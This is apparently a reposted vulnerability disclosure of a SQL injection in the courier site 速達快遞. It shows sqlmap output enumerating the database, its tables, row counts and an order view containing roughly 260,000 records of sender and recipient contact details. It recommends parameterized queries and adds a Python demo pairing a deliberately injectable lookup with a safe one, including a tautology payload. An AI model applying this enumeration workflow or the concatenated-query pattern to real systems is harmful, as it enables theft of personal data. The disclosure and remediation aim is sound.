A SQL injection in 速達快遞 (260,000 order records exposed, including amounts and other details)
1. Log in to 速達快遞, open the page shown below and click 倉庫存儲 (Warehouse Storage)
2.
3. Capture the request
4. Save the captured request to a text file and run sqlmap against it
5. Databases
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] kuaidi0522
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
6. Tables
Database: kuaidi0522
[61 tables]
+---------------------+
| BalanceLog |
| CustomerJFLog |
| CustomerJFLog |
| DBKouAn |
| DP_BaoZhuang |
| DP_JJDZ |
| DP_relax |
| Daigou |
| DeliType |
| Downs |
| EpsPrint |
| JF_Goods |
| Job |
| OrderFormat |
| OrderFormat |
| OrderPackage |
| PackPrice |
| PackPrice |
| PackType |
| Pags |
| PayMode |
| PayType |
| Query |
| SendType |
| StateType |
| StoreCangKu |
| StoreClass |
| StoreInfo_Items |
| StoreInfo_Items |
| StoreItem |
| StoreLog |
| StoreOutInfo_Items |
| StoreOutInfo_Items |
| StorePrice |
| Store_ZYGS |
| UserIds |
| VirtualOrders |
| WebInfo |
| addressbook |
| adminLogin |
| bagInfo |
| city |
| kd_join |
| kd_know |
| kd_message |
| kd_news |
| kd_ps |
| kd_qa |
| kd_url |
| orderlog |
| siteLog |
| type1 |
| type2 |
| vBagsOrder |
| vJJRelax |
| vOrderList |
| vStoreInfo_Items |
| vStoreInfo_Items |
| vStoreOutInfo_Items |
| vStoreOutInfo_Items |
| vw_Customer |
+---------------------+
sqlmap resumed the following injection point(s) from stored session:
7. Row counts
Database: kuaidi0522
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.orderlog | 1412665 |
| dbo.OrderPackage | 264665 |
| dbo.vOrderList | 264556 |
+-------------------------+---------+
vOrderList, the order view, holds about 260,000 orders.
8. Now look at the structure of that view
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: kuaidi0522
Table: vOrderList
[47 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Aweight | nvarchar |
| baozhuangID | int |
| CM | int |
| deliID | int |
| DIM | nvarchar |
| epsno | varchar |
| FTEdate | nvarchar |
| id | int |
| indat | datetime |
| isdel | int |
| ispay | int |
| orderid | nvarchar |
| orderprice | decimal |
| packages | nvarchar |
| packid | int |
| packtypeid | int |
| payerAccount | nvarchar |
| PayModeID | int |
| PayTypeID | int |
| recaddress | nvarchar |
| reccompany | nvarchar |
| reccountry | nvarchar |
| recdate | nvarchar |
| recer | nvarchar |
| recphone | nvarchar |
| recpostal | nvarchar |
| recsign | nvarchar |
| sendaddress | nvarchar |
| sendcompany | nvarchar |
| sendcountry | nvarchar |
| sender | nvarchar |
| sendphone | nvarchar |
| sendpostal | nvarchar |
| sendsign | nvarchar |
| sendtype | nvarchar |
| sentID | int |
| signdate | nvarchar |
| state | int |
| tax | nvarchar |
| totalValue | nvarchar |
| txt1111 | nvarchar |
| txt2222 | nvarchar |
| txt3333 | nvarchar |
| txt4444 | nvarchar |
| username | nvarchar |
| Vweight | nvarchar |
| zydh | nvarchar |
+--------------+----------+
The view carries the sender's name, company, address and phone number (sender, sendcompany, sendaddress, sendphone), the order amount (orderprice), and the recipient's company, address and phone number (reccompany, recaddress, recphone).
Solution:
Use parameterized queries.
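To make the fix concrete, here is an added example that is not part of the original report or of the vendor's code. It uses an in-memory SQLite table as a stand-in for the SQL Server view vOrderList (the column names are taken from the report, the rows are constructed) and contrasts an order lookup that splices user input into the SQL text with the same lookup written as a parameterized statement. In an ASP.NET application the parameterized form corresponds to SqlCommand with SqlParameter values rather than string concatenation.

```python
import sqlite3

# Constructed sample rows; the column names follow the vOrderList view in the report.
SAMPLE_ORDERS = [
    ("SD0001", "Alice", "Bob", 120.50),
    ("SD0002", "Carol", "Dave", 89.00),
    ("SD0003", "Erin", "Frank", 310.25),
]


def make_db():
    """Build an in-memory SQLite database standing in for kuaidi0522 (assumption: SQLite, not SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE vOrderList (orderid TEXT, sender TEXT, recer TEXT, orderprice REAL)"
    )
    conn.executemany("INSERT INTO vOrderList VALUES (?, ?, ?, ?)", SAMPLE_ORDERS)
    return conn


def lookup_vulnerable(conn, orderid):
    """Defective pattern: the user-supplied order id becomes part of the SQL text,
    so quotes in the input change the meaning of the WHERE clause."""
    sql = (
        "SELECT orderid, sender, recer, orderprice FROM vOrderList "
        "WHERE orderid = '" + orderid + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, orderid):
    """The fix: the statement is fixed text and the value travels as a bound
    parameter, so it is compared as data and never parsed as SQL."""
    sql = "SELECT orderid, sender, recer, orderprice FROM vOrderList WHERE orderid = ?"
    return conn.execute(sql, (orderid,)).fetchall()


def compare(orderid):
    """Return (rows from the vulnerable query, rows from the parameterized query)
    for the same input, so the difference in behaviour is visible."""
    conn = make_db()
    try:
        return len(lookup_vulnerable(conn, orderid)), len(lookup_parameterized(conn, orderid))
    finally:
        conn.close()


if __name__ == "__main__":
    # A genuine order id: both forms return exactly one row.
    print(compare("SD0002"))        # (1, 1)
    # A textbook tautology: the concatenated query returns every order,
    # the parameterized query returns none because no orderid equals that string.
    print(compare("x' OR '1'='1"))  # (3, 0)
```

The second call is the whole point: with concatenation the quote in the input closes the literal and the rest is executed as SQL, which is the condition sqlmap exploited here; with a bound parameter the same bytes are just an order id that matches nothing.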
Reposts welcome: http://www.kanwencang.com/bangong/20161102/33303.html